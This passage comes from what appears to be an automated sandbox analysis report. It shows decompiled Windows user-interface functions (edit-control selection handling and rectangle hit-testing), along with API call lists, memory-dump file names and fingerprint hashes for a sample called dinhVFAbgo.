											_t274 =  *(_t280 - 0x24);
											if(_t274 == 0xffffffff || _t274 <=  *(_t280 - 0x14)) {
												goto L26;
											} else {
												E00CCC671(_t270, _t274, _t274, 0);
												_t228 = _t274;
												 *(_t280 - 0x14) = _t274;
												 *(_t280 - 0x18) = _t274;
												goto L18;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L45:
					MessageBeep(0xffffffff);
					_push(0);
					_push( *(_t280 - 0x20));
					L46:
					_push(_t274);
					_t140 = E00CCC671(_t270);
				}
				return E00DDD4FA(_t140);
			}

0x00ccb6a1
0x00ccb6a8
0x00ccb6ad
0x00ccb6af
0x00ccb6b2
0x00ccb6b5
0x00ccb6b8
0x00ccb6bf
0x00ccb6cc
0x00ccb6ce
0x00ccb6d4
0x00000000
0x00ccb6d4
0x00ccb6c1
0x00ccb6c5
0x00ccb6d9
0x00ccb6d9
0x00ccb6dc
0x00ccb6ed
0x00ccb702
0x00ccb707
0x00ccb70a
0x00ccb70d
0x00ccb712
0x00ccb725
0x00000000
0x00ccb72b
0x00ccb72b
0x00ccb730
0x00000000
0x00ccb746
0x00ccb748
0x00ccb8d4
0x00ccb8d9
0x00ccb8db
0x00000000
0x00ccb8dd
0x00ccb8e3
0x00ccb8e5
0x00ccb8e8
0x00ccba76
0x00ccba7e
0x00ccba83
0x00ccba86
0x00000000
0x00ccb8ee
0x00ccb8ee
0x00ccb8fa
0x00ccb901
0x00ccb904
0x00ccb907
0x00ccb90c
0x00ccb912
0x00ccb915
0x00ccb917
0x00ccb91a
0x00ccb91a
0x00ccb91c
0x00000000
0x00000000
0x00ccb921
0x00ccb926
0x00ccb929
0x00ccb92b
0x00ccb92c
0x00000000
0x00ccb92c
0x00000000
0x00ccb929
0x00ccb937
0x00ccb93a
0x00ccb93d
0x00ccb942
0x00ccb943
0x00ccb945
0x00ccb966
0x00ccb96c
0x00ccb971
0x00ccb974
0x00ccb977
0x00ccb979
0x00ccb981
0x00ccb986
0x00ccb98c
0x00ccb995
0x00ccb999
0x00ccb9a1
0x00ccb9a7
0x00ccb9af
0x00ccb9ba
0x00ccb9bb
0x00ccb9c5
0x00ccb9c9
0x00ccb9cd
0x00ccb9d5
0x00ccb9db
0x00ccb9e7
0x00ccb9ec
0x00ccb9ef
0x00ccb9ef
0x00ccb9f9
0x00ccb9fe
0x00ccba0c
0x00ccba1a
0x00ccba1f
0x00ccba22
0x00ccba25
0x00ccba27
0x00ccba2a
0x00ccba3e
0x00ccba43
0x00ccba44
0x00ccba44
0x00ccba49
0x00ccba4c
0x00ccba4c
0x00ccba4c
0x00ccba5f
0x00ccb947
0x00ccb949
0x00ccb952
0x00ccb955
0x00000000
0x00ccb955
0x00ccb945
0x00ccb8e8
0x00ccb74e
0x00ccb754
0x00ccb759
0x00ccb88c
0x00ccb88e
0x00ccb8ad
0x00ccb8b5
0x00ccb8ba
0x00ccb8bd
0x00ccb8c0
0x00ccb8c0
0x00ccb8c4
0x00000000
0x00000000
0x00000000
0x00ccb75f
0x00ccb762
0x00ccb7b2
0x00ccb7b8
0x00ccb7bd
0x00ccb7bf
0x00000000
0x00ccb7c5
0x00ccb7d0
0x00ccb7d5
0x00ccb7d7
0x00ccb7fa
0x00ccb80b
0x00ccb819
0x00ccb82e
0x00ccb834
0x00ccb83a
0x00ccb840
0x00ccb849
0x00ccb84c
0x00ccb85e
0x00ccb863
0x00ccb866
0x00ccb866
0x00ccb86c
0x00ccb87a
0x00ccb87b
0x00000000
0x00ccb87b
0x00ccb86c
0x00ccb83a
0x00ccb764
0x00ccb770
0x00ccb890
0x00ccb892
0x00ccb776
0x00ccb786
0x00ccb78b
0x00ccb791
0x00000000
0x00ccb7a0
0x00ccb7a5
0x00ccb7aa
0x00ccb7ac
0x00ccb7af
0x00000000
0x00ccb7af
0x00ccb791
0x00ccb770
0x00ccb762
0x00ccb759
0x00ccb748
0x00ccb730
0x00ccba8e
0x00ccba8e
0x00ccba90
0x00ccba96
0x00ccba98
0x00ccba9b
0x00ccba9b
0x00ccba9e
0x00ccba9e
0x00ccbaa8

APIs

__EH_prolog3.LIBCMT ref: 00CCB6A8

Part of subcall function 00CB778C: GetWindowLongA.USER32 ref: 00CB7799

SendMessageA.USER32(?,000000B0,?,?), ref: 00CCB6ED
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCB82E
MessageBeep.USER32(000000FF), ref: 00CCB892
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCB8AD
SendMessageA.USER32(?,000000C2,00000001,00000000), ref: 00CCB7EE

Part of subcall function 00CCC671: SendMessageA.USER32(?,000000B1,?,000000FF), ref: 00CCC685
Part of subcall function 00CCC671: SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00CCC69D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Message$Send$BeepH_prolog3LongWindow
String ID:
API String ID: 29510489-0
Opcode ID: 8cde08687a3fe149ac73b6d29c781acec39dc1ea5a548f7d69419476f9229380
Instruction ID: 0e464647f4c6a1308a0f40209ce8725221663b0767ed68a4bb1fd983d063b75d
Opcode Fuzzy Hash: 8cde08687a3fe149ac73b6d29c781acec39dc1ea5a548f7d69419476f9229380
Instruction Fuzzy Hash: 2DC13871A0011AAFCF05EBE4C896EEEB7B9EF48310F14411AF951B7291DB34AD45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB29E Relevance: 15.3, APIs: 10, Instructions: 339
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CCB29E(void* __ebx, long __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t150;
				char _t158;
				void* _t167;
				void* _t177;
				void* _t178;
				intOrPtr* _t181;
				void* _t183;
				void* _t187;
				intOrPtr _t194;
				void* _t210;
				void* _t211;
				void* _t215;
				void* _t219;
				void* _t220;
				intOrPtr _t222;
				long _t227;
				void* _t228;
				void* _t229;
				long _t257;
				void* _t276;
				void* _t277;
				long _t279;
				intOrPtr _t280;
				void* _t281;
				intOrPtr _t285;
				long _t286;
				void* _t288;
				intOrPtr _t290;
				void* _t292;

				_push(0x30);
				E00DDD52C(0xe098b1, __ebx, __edi, __esi);
				_t279 = __ecx;
				 *(_t292 - 0x1c) = __ecx;
				SendMessageA( *(__ecx + 0x20), 0xb0, _t292 - 0x28, _t292 - 0x24);
				SendMessageA( *(_t279 + 0x20), 0xb0, _t292 - 0x20, _t292 - 0x14);
				E00CCAB29(_t279, _t292 - 0x20, _t292 - 0x14,  *(_t292 - 0x20), 1);
				_t227 =  *(_t292 - 0x28);
				_t276 =  *(_t292 - 0x24);
				 *(_t292 - 0x34) = _t227;
				if(_t227 >= 0 || _t276 <=  *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x80)) - 0xc))) {
					if(_t227 <  *(_t292 - 0x20) || _t227 >  *(_t292 - 0x14) || _t276 <  *(_t292 - 0x20) || _t276 >  *(_t292 - 0x14)) {
						goto L42;
					} else {
						 *(_t292 - 0x18) = 0;
						if(_t227 != _t276) {
							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x88)) - 0xc));
							if(__eflags == 0) {
								SendMessageA( *(_t279 + 0x20), 0xb0, _t292 - 0x3c, _t292 - 0x18);
								E00CB236A(_t227, _t279, __eflags);
								_push( *(_t292 - 0x18));
								_push( *(_t292 - 0x3c));
								goto L27;
							} else {
								 *((intOrPtr*)(_t292 - 0x30)) = _t279 + 0x84;
								_t285 = 1;
								__eflags = 1;
								_t158 = E00CAAF63(_t279 + 0x84, _t227);
								_t280 =  *((intOrPtr*)(_t292 - 0x30));
								 *((char*)(_t292 - 0xd)) = _t158;
								_t228 = _t227 + 1;
								while(1) {
									__eflags = _t228 -  *(_t292 - 0x14);
									if(_t228 >=  *(_t292 - 0x14)) {
										break;
									}
									_t187 = E00CAAF63(_t280, _t228);
									__eflags = _t187 -  *((intOrPtr*)(_t292 - 0xd));
									if(_t187 ==  *((intOrPtr*)(_t292 - 0xd))) {
										_t228 = _t228 + 1;
										_t285 = _t285 + 1;
										continue;
									}
									break;
								}
								_t279 =  *(_t292 - 0x1c);
								_t229 =  *(_t292 - 0x34);
								 *((intOrPtr*)(_t292 - 0x2c)) = _t285;
								__eflags =  *(_t292 - 0x24) -  *(_t292 - 0x28) - _t285;
								if( *(_t292 - 0x24) -  *(_t292 - 0x28) <= _t285) {
									 *(_t292 - 0x34) = _t279 + 0x80;
									E00CA7B78(_t279 + 0x80, _t292 - 0x1c, _t229, _t285);
									 *(_t292 - 4) = 2;
									__eflags = _t285;
									if(_t285 > 0) {
										_t288 =  *(_t292 - 0x24) -  *(_t292 - 0x28);
										__eflags =  *((intOrPtr*)(_t292 - 0x2c)) - _t288;
										_t177 = E00CA921F(_t292 - 0x1c, _t292 - 0x38,  *((intOrPtr*)(_t292 - 0x2c)) - _t288);
										 *(_t292 - 4) = 3;
										_t178 = E00CA68A8(_t292 - 0x1c, _t177);
										 *(_t292 - 4) = 2;
										E00CA2975(_t178,  *(_t292 - 0x38) - 0x10);
										_push(_t288);
										_push( *(_t279 + 0x8c) & 0x000000ff);
										_t181 = E00CCA7D9(_t229, _t292 - 0x38, _t279, _t288, __eflags);
										 *(_t292 - 4) = 4;
										_push( *((intOrPtr*)( *_t181 - 0xc)));
										_t183 = E00CA93E8(_t229, _t292 - 0x1c, _t279,  *_t181);
										 *(_t292 - 4) = 2;
										E00CA2975(_t183,  *(_t292 - 0x38) - 0x10);
										_t285 =  *((intOrPtr*)(_t292 - 0x2c));
									}
									E00CCC671(_t279, _t229, _t229 + _t285, 0);
									_t286 =  *(_t292 - 0x1c);
									SendMessageA( *(_t279 + 0x20), 0xc2, 1, _t286);
									E00CCC671(_t279, _t229, _t229, 0);
									_t167 = 0;
									__eflags =  *((intOrPtr*)(_t286 - 0xc));
									if( *((intOrPtr*)(_t286 - 0xc)) > 0) {
										_t281 =  *(_t292 - 0x34);
										do {
											E00CBFBBF(_t229, _t281, _t281, _t286,  *(_t292 - 0x18) + _t229, E00CAAF63(_t292 - 0x1c, _t167) & 0x000000ff);
											_t167 =  *(_t292 - 0x18) + 1;
											 *(_t292 - 0x18) = _t167;
											__eflags = _t167 -  *((intOrPtr*)(_t286 - 0xc));
										} while (_t167 <  *((intOrPtr*)(_t286 - 0xc)));
									}
									goto L40;
								} else {
									MessageBeep(0xffffffff);
									_push(0);
									_push(_t229 + _t285);
									_push(_t229);
									goto L43;
								}
							}
						} else {
							if( *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x84)) - 0xc)) == 0) {
								SendMessageA( *(_t279 + 0x20), 0xb0, _t292 - 0x34, _t292 - 0x38);
								E00CB236A(_t227, _t279, __eflags);
								_push( *(_t292 - 0x38));
								_push( *(_t292 - 0x34));
								L27:
								_push(1);
								_t150 = E00CCA9DE(_t227, _t279, _t279, 0xb0, __eflags);
							} else {
								if(_t276 ==  *(_t292 - 0x14)) {
									L25:
									_t150 = MessageBeep(0xffffffff);
								} else {
									_t290 = 1;
									 *((intOrPtr*)(_t292 - 0x30)) = 1;
									 *((char*)(_t292 - 0xd)) = E00CAAF63(_t279 + 0x84, _t227);
									_t194 = _t227 + 1;
									while(1) {
										_t277 =  *(_t292 - 0x14);
										 *((intOrPtr*)(_t292 - 0x2c)) = _t194;
										if(_t194 >= _t277) {
											break;
										}
										if(E00CAAF63(_t279 + 0x84, _t194) !=  *((intOrPtr*)(_t292 - 0xd))) {
											_t277 =  *(_t292 - 0x14);
										} else {
											_t194 =  *((intOrPtr*)(_t292 - 0x2c)) + 1;
											_t290 = _t290 + 1;
											 *((intOrPtr*)(_t292 - 0x30)) = _t290;
											continue;
										}
										break;
									}
									 *(_t292 - 0x1c) = _t227;
									 *((intOrPtr*)(_t292 - 0x2c)) = _t227 + _t290;
									_t257 = _t227;
									_t196 = _t279 + 0x80;
									 *(_t292 - 0x38) = _t279 + 0x80;
									__eflags =  *((intOrPtr*)(_t292 - 0x2c)) - _t277;
									if( *((intOrPtr*)(_t292 - 0x2c)) >= _t277) {
										L20:
										E00CA7B78(_t196, _t292 - 0x1c, _t227, _t290);
										 *(_t292 - 4) =  *(_t292 - 4) & 0x00000000;
										__eflags = _t290;
										if(_t290 > 0) {
											_t57 = _t290 - 1; // 0x0
											_t210 = E00CA921F(_t292 - 0x1c, _t292 - 0x34, _t57);
											 *(_t292 - 4) = 1;
											_t211 = E00CA68A8(_t292 - 0x1c, _t210);
											 *(_t292 - 4) = 0;
											E00CA2975(_t211,  *(_t292 - 0x34) - 0x10);
											E00CA9B75(_t292 - 0x1c,  *(_t279 + 0x8c) & 0x000000ff);
										}
										E00CCC671(_t279, _t227, _t227 + _t290, 0);
										_t286 =  *(_t292 - 0x1c);
										SendMessageA( *(_t279 + 0x20), 0xc2, 1, _t286);
										E00CCC671(_t279, _t227, _t227, 0);
										_t167 = 0;
										__eflags =  *((intOrPtr*)(_t286 - 0xc));
										if( *((intOrPtr*)(_t286 - 0xc)) > 0) {
											do {
												E00CBFBBF(_t227,  *(_t292 - 0x38), _t279, _t286,  *(_t292 - 0x18) + _t227, E00CAAF63(_t292 - 0x1c, _t167) & 0x000000ff);
												_t167 =  *(_t292 - 0x18) + 1;
												 *(_t292 - 0x18) = _t167;
												__eflags = _t167 -  *((intOrPtr*)(_t286 - 0xc));
											} while (_t167 <  *((intOrPtr*)(_t286 - 0xc)));
										}
										L40:
										_t150 = E00CA2975(_t167, _t286 - 0x10);
									} else {
										do {
											_t215 = E00CAAF63(_t196, _t257);
											__eflags = _t215 -  *(_t279 + 0x8c);
											if(_t215 ==  *(_t279 + 0x8c)) {
												goto L18;
											} else {
												_t219 = E00CAAF63(_t279 + 0x84,  *(_t292 - 0x1c));
												_t220 = E00CAAF63(_t279 + 0x80,  *(_t292 - 0x1c));
												 *0xe17a64(_t220, _t219);
												_t222 =  *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x164))))();
												__eflags = _t222;
												if(_t222 == 0) {
													goto L25;
												} else {
													_t290 =  *((intOrPtr*)(_t292 - 0x30));
													goto L18;
												}
											}
											goto L44;
											L18:
											_t257 =  *(_t292 - 0x1c) + 1;
											 *(_t292 - 0x1c) = _t257;
											__eflags = _t257 + _t290 -  *(_t292 - 0x14);
											_t196 = _t279 + 0x80;
										} while (_t257 + _t290 <  *(_t292 - 0x14));
										_t227 =  *(_t292 - 0x34);
										goto L20;
									}
								}
							}
						}
					}
				} else {
					L42:
					MessageBeep(0xffffffff);
					_push(0);
					_push( *(_t292 - 0x14));
					_push( *(_t292 - 0x20));
					L43:
					_t150 = E00CCC671(_t279);
				}
				L44:
				return E00DDD4FA(_t150);
			}

0x00ccb29e
0x00ccb2a5
0x00ccb2aa
0x00ccb2ac
0x00ccb2c0
0x00ccb2d2
0x00ccb2e7
0x00ccb2ec
0x00ccb2ef
0x00ccb2f2
0x00ccb2f7
0x00ccb30b
0x00000000
0x00ccb32c
0x00ccb32e
0x00ccb333
0x00ccb508
0x00ccb50b
0x00ccb66a
0x00ccb672
0x00ccb677
0x00ccb67a
0x00000000
0x00ccb511
0x00ccb51c
0x00ccb51f
0x00ccb51f
0x00ccb520
0x00ccb525
0x00ccb52b
0x00ccb52e
0x00ccb530
0x00ccb530
0x00ccb533
0x00000000
0x00000000
0x00ccb538
0x00ccb53d
0x00ccb540
0x00ccb542
0x00ccb543
0x00000000
0x00ccb543
0x00000000
0x00ccb540
0x00ccb54c
0x00ccb54f
0x00ccb552
0x00ccb555
0x00ccb557
0x00ccb578
0x00ccb57e
0x00ccb583
0x00ccb58a
0x00ccb58c
0x00ccb594
0x00ccb59a
0x00ccb5a1
0x00ccb5aa
0x00ccb5ae
0x00ccb5b6
0x00ccb5bd
0x00ccb5cc
0x00ccb5cd
0x00ccb5ce
0x00ccb5d8
0x00ccb5dc
0x00ccb5e0
0x00ccb5e8
0x00ccb5ef
0x00ccb5f4
0x00ccb5f4
0x00ccb600
0x00ccb605
0x00ccb613
0x00ccb61f
0x00ccb624
0x00ccb626
0x00ccb629
0x00ccb62b
0x00ccb62e
0x00ccb643
0x00ccb64b
0x00ccb64c
0x00ccb64f
0x00ccb64f
0x00ccb62e
0x00000000
0x00ccb559
0x00ccb55b
0x00ccb561
0x00ccb566
0x00ccb567
0x00000000
0x00ccb567
0x00ccb557
0x00ccb339
0x00ccb342
0x00ccb4e1
0x00ccb4e9
0x00ccb4ee
0x00ccb4f1
0x00ccb4f4
0x00ccb4f4
0x00ccb4f8
0x00ccb348
0x00ccb34b
0x00ccb4c8
0x00ccb4ca
0x00ccb351
0x00ccb359
0x00ccb35b
0x00ccb363
0x00ccb366
0x00ccb369
0x00ccb369
0x00ccb36c
0x00ccb371
0x00000000
0x00000000
0x00ccb382
0x00ccb38e
0x00ccb384
0x00ccb387
0x00ccb388
0x00ccb389
0x00000000
0x00ccb389
0x00000000
0x00ccb382
0x00ccb394
0x00ccb397
0x00ccb39a
0x00ccb39c
0x00ccb3a2
0x00ccb3a5
0x00ccb3a8
0x00ccb413
0x00ccb41b
0x00ccb420
0x00ccb424
0x00ccb426
0x00ccb428
0x00ccb433
0x00ccb43c
0x00ccb440
0x00ccb448
0x00ccb44f
0x00ccb45f
0x00ccb45f
0x00ccb46d
0x00ccb472
0x00ccb480
0x00ccb48c
0x00ccb491
0x00ccb493
0x00ccb496
0x00ccb49c
0x00ccb4b2
0x00ccb4ba
0x00ccb4bb
0x00ccb4be
0x00ccb4be
0x00ccb4c3
0x00ccb654
0x00ccb657
0x00ccb3aa
0x00ccb3aa
0x00ccb3ad
0x00ccb3b2
0x00ccb3b8
0x00000000
0x00ccb3ba
0x00ccb3cd
0x00ccb3dd
0x00ccb3e6
0x00ccb3ee
0x00ccb3f0
0x00ccb3f2
0x00000000
0x00ccb3f8
0x00ccb3f8
0x00000000
0x00ccb3f8
0x00ccb3f2
0x00000000
0x00ccb3fb
0x00ccb3fe
0x00ccb3ff
0x00ccb405
0x00ccb408
0x00ccb408
0x00ccb410
0x00000000
0x00ccb410
0x00ccb3a8
0x00ccb34b
0x00ccb342
0x00ccb333
0x00ccb682
0x00ccb682
0x00ccb684
0x00ccb68a
0x00ccb68c
0x00ccb68f
0x00ccb692
0x00ccb694
0x00ccb694
0x00ccb699
0x00ccb69e

APIs

__EH_prolog3.LIBCMT ref: 00CCB2A5
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCB2C0
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCB2D2
SendMessageA.USER32(?,000000C2,00000001,?), ref: 00CCB480
MessageBeep.USER32(000000FF), ref: 00CCB4CA
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCB66A
MessageBeep.USER32(000000FF), ref: 00CCB684

Part of subcall function 00CCC671: SendMessageA.USER32(?,000000B1,?,000000FF), ref: 00CCC685
Part of subcall function 00CCC671: SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00CCC69D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Message$Send$Beep$H_prolog3
String ID:
API String ID: 204075910-0
Opcode ID: b06b1a92ee2ae656a4780ae35efa426170a8fe4ba0046010bf899e08068cdb4d
Instruction ID: f47a47c39a270e11276ee9c2709f293800721515969516445155b9f193a1ac44
Opcode Fuzzy Hash: b06b1a92ee2ae656a4780ae35efa426170a8fe4ba0046010bf899e08068cdb4d
Instruction Fuzzy Hash: 5CD15A71E0015AAFCF19DBE4C886EEEBBB9FF08304F14411AF555A3291DB346A05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D53327 Relevance: 15.3, APIs: 10, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00D53327(void* __ecx, void* __edx, struct tagPOINT _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, signed int _a32, signed int _a36) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				long _v44;
				long _v48;
				long _v52;
				char _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t135;
				intOrPtr _t138;
				intOrPtr _t139;
				RECT* _t141;
				void* _t142;
				intOrPtr* _t146;
				int _t157;
				long _t175;
				int _t188;
				intOrPtr* _t215;
				void* _t216;
				intOrPtr _t221;
				intOrPtr _t222;
				intOrPtr _t223;
				void* _t231;
				signed int _t232;
				signed int _t233;
				signed int _t236;
				signed int _t248;

				_t231 = __edx;
				_t216 = __ecx;
				_t135 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t135 ^ _t236;
				_v68 = _v68 & 0x00000000;
				_t215 = _a28;
				_t234 = _a12;
				_v60 = _a36;
				_t233 = _t232 | 0xffffffff;
				_t138 = _a20;
				if(_t138 != 0) {
					L3:
					_t139 =  *((intOrPtr*)(_t138 + 0x1b8));
					if(_t139 != 0 &&  *((intOrPtr*)(_t139 + 8)) != 0 &&  *((intOrPtr*)(_t139 + 4)) != 0) {
						_t233 =  *(_t139 + 0x110);
						_v68 = 1;
					}
					L7:
					_v40.left = 0;
					_v40.top = 0;
					_v40.right = 0;
					_v40.bottom = 0;
					if(_t234 == 0) {
						_t141 = _v60;
						if(_t141 == 0) {
							L20:
							_t142 = 0;
							L21:
							return E00DDCBCE(_t142, _t215, _v8 ^ _t236, _t231, _t233, _t234);
						}
						CopyRect( &_v40, _t141);
						L11:
						_v72 = _v72 & 0x00000000;
						_v60 = _v60 & 0x00000000;
						_t146 = E00CACA6C(0xe6896c, _t234);
						_v64 = _t146;
						if(_t146 != 0) {
							 *0xe17a64();
							_v72 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x1a4))))();
							_v56 = 0;
							_v52 = 0;
							_v48 = 0;
							_v44 = 0;
							_v24.left = 0;
							_v24.top = 0;
							_v24.right = 0;
							_v24.bottom = 0;
							_t234 =  *((intOrPtr*)( *_v64 + 0x32c));
							 *0xe17a64( &_v56,  &_v24);
							 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x32c))))();
							_v60 = _v24.bottom - _v24.top;
						}
						if(_a24 == 0) {
							if(_v68 == 0) {
								_t234 = _a16;
								_push(_a8);
								_v24.left = _v40.left - _t234;
								_v24.top = _v40.top - _t234;
								_v24.right = _v40.right + _t234;
								_v24.bottom = _v72 + _v40.top + _t234;
								_t157 = PtInRect( &_v24, _a4.x);
								_t233 = _a32;
								if(_t157 == 0 || (_t233 & 0x00002000) == 0) {
									_push(_a8);
									_v24.right = _v40.left + _t234;
									_v24.bottom = _v40.bottom + _t234;
									if(PtInRect( &_v24, _a4.x) == 0 || (_t233 & 0x00001000) == 0) {
										_t221 = _v40.bottom;
										_push(_a8);
										_v24.left = _v40.left - _t234;
										_v24.top = _t221 - _v60 - _t234;
										_v24.right = _v40.right + _t234;
										_v24.bottom = _t221 + _t234;
										if(PtInRect( &_v24, _a4.x) == 0 || (_t233 & 0x00008000) == 0) {
											_t175 = _v40.right - _t234;
											goto L42;
										} else {
											goto L40;
										}
									} else {
										goto L37;
									}
								} else {
									goto L33;
								}
							}
							_t233 = _t233 - 4;
							goto L16;
						} else {
							if(_v68 == 0) {
								_t234 = _a16;
								_t222 = _v40.top;
								_push(_a8);
								_v24.left = _v40.left - _t234;
								_v24.bottom = _t222;
								_v24.top = _t222 - _t234;
								_v24.right = _v40.right + _t234;
								_t188 = PtInRect( &_v24, _a4.x);
								_t233 = _a32;
								if(_t188 == 0 || (_t233 & 0x00002000) == 0) {
									_push(_a8);
									_v24.right = _v40.left;
									_v24.bottom = _v40.bottom + _t234;
									if(PtInRect( &_v24, _a4.x) == 0 || (_t233 & 0x00001000) == 0) {
										_t223 = _v40.bottom;
										_push(_a8);
										_v24.left = _v40.left - _t234;
										_v24.top = _t223;
										_v24.right = _v40.right + _t234;
										_v24.bottom = _t223 + _t234;
										if(PtInRect( &_v24, _a4.x) == 0 || (_t233 & 0x00008000) == 0) {
											_t175 = _v40.right;
											L42:
											_push(_a8);
											_v24.left = _t175;
											_v24.top = _v40.top - _t234;
											if(PtInRect( &_v24, _a4) == 0 || (_t233 & 0x00004000) == 0) {
												goto L20;
											} else {
												L44:
												 *_t215 = 0x4000;
												goto L34;
											}
										} else {
											L40:
											 *_t215 = 0x8000;
											goto L34;
										}
									} else {
										L37:
										 *_t215 = 0x1000;
										goto L34;
									}
								} else {
									L33:
									 *_t215 = 0x2000;
									L34:
									_t142 = 1;
									goto L21;
								}
							}
							_t233 = _t233;
							_t248 = _t233;
							L16:
							if(_t248 == 0) {
								goto L37;
							}
							_t233 = _t233 - 1;
							if(_t233 == 0) {
								goto L44;
							}
							_t233 = _t233 - 1;
							if(_t233 == 0) {
								goto L33;
							}
							if(_t233 == 0) {
								goto L40;
							}
							goto L20;
						}
					}
					GetWindowRect( *(_t234 + 0x20),  &_v40);
					goto L11;
				}
				if(_t234 == 0) {
					goto L7;
				}
				_t138 = E00D537D5(0xe6872c, _t231, E00CB277F(_t215, _t216, _t231, GetParent( *(_t234 + 0x20))));
				if(_t138 == 0) {
					goto L7;
				}
				goto L3;
			}

0x00d53327
0x00d53327
0x00d5332d
0x00d53334
0x00d5333a
0x00d5333f
0x00d53343
0x00d53347
0x00d5334a
0x00d5334d
0x00d53352
0x00d53376
0x00d53376
0x00d5337e
0x00d5338c
0x00d53392
0x00d53392
0x00d53399
0x00d5339b
0x00d5339e
0x00d533a1
0x00d533a4
0x00d533a9
0x00d533ba
0x00d533bf
0x00d5347b
0x00d5347b
0x00d5347d
0x00d5348b
0x00d5348b
0x00d533ca
0x00d533d0
0x00d533d0
0x00d533d4
0x00d533de
0x00d533e3
0x00d533ea
0x00d533f6
0x00d53401
0x00d53409
0x00d5340c
0x00d5340f
0x00d53412
0x00d53415
0x00d53418
0x00d5341b
0x00d5341e
0x00d5342b
0x00d53433
0x00d5343c
0x00d53444
0x00d53444
0x00d5344b
0x00d53547
0x00d53551
0x00d53557
0x00d5355f
0x00d53567
0x00d5356f
0x00d5357a
0x00d53581
0x00d53587
0x00d5358c
0x00d535a7
0x00d535af
0x00d535b7
0x00d535c6
0x00d535db
0x00d535e0
0x00d535e3
0x00d535f0
0x00d535f8
0x00d535fe
0x00d5360d
0x00d53625
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d5358c
0x00d53549
0x00000000
0x00d53451
0x00d53455
0x00d53491
0x00d53496
0x00d53499
0x00d5349c
0x00d534a6
0x00d534a9
0x00d534b1
0x00d534b8
0x00d534be
0x00d534c3
0x00d534d4
0x00d534d7
0x00d534e2
0x00d534f1
0x00d53502
0x00d53507
0x00d5350a
0x00d53515
0x00d53518
0x00d5351e
0x00d5352d
0x00d5353b
0x00d53627
0x00d53627
0x00d5362a
0x00d53635
0x00d53644
0x00000000
0x00d53656
0x00d53656
0x00d53656
0x00000000
0x00d53656
0x00d53617
0x00d53617
0x00d53617
0x00000000
0x00d53617
0x00d535d0
0x00d535d0
0x00d535d0
0x00000000
0x00d535d0
0x00d53596
0x00d53596
0x00d53596
0x00d5359c
0x00d5359e
0x00000000
0x00d5359e
0x00d534c3
0x00d53457
0x00d53457
0x00d5345a
0x00d5345a
0x00000000
0x00000000
0x00d53460
0x00d53463
0x00000000
0x00000000
0x00d53469
0x00d5346c
0x00000000
0x00000000
0x00d53475
0x00000000
0x00000000
0x00000000
0x00d53475
0x00d5344b
0x00d533b2
0x00000000
0x00d533b2
0x00d53356
0x00000000
0x00000000
0x00d5336d
0x00d53374
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 00D5335B
GetWindowRect.USER32 ref: 00D533B2
CopyRect.USER32 ref: 00D533CA
PtInRect.USER32(?,00000000,?), ref: 00D534B8
PtInRect.USER32(?,00000000,?), ref: 00D534E9
PtInRect.USER32(?,00000000,?), ref: 00D53525
PtInRect.USER32(?,00000000,?), ref: 00D53581
PtInRect.USER32(?,00000000,?), ref: 00D535BE
PtInRect.USER32(?,00000000,?), ref: 00D53605
PtInRect.USER32(?,00000000,?), ref: 00D5363C

Memory Dump Source

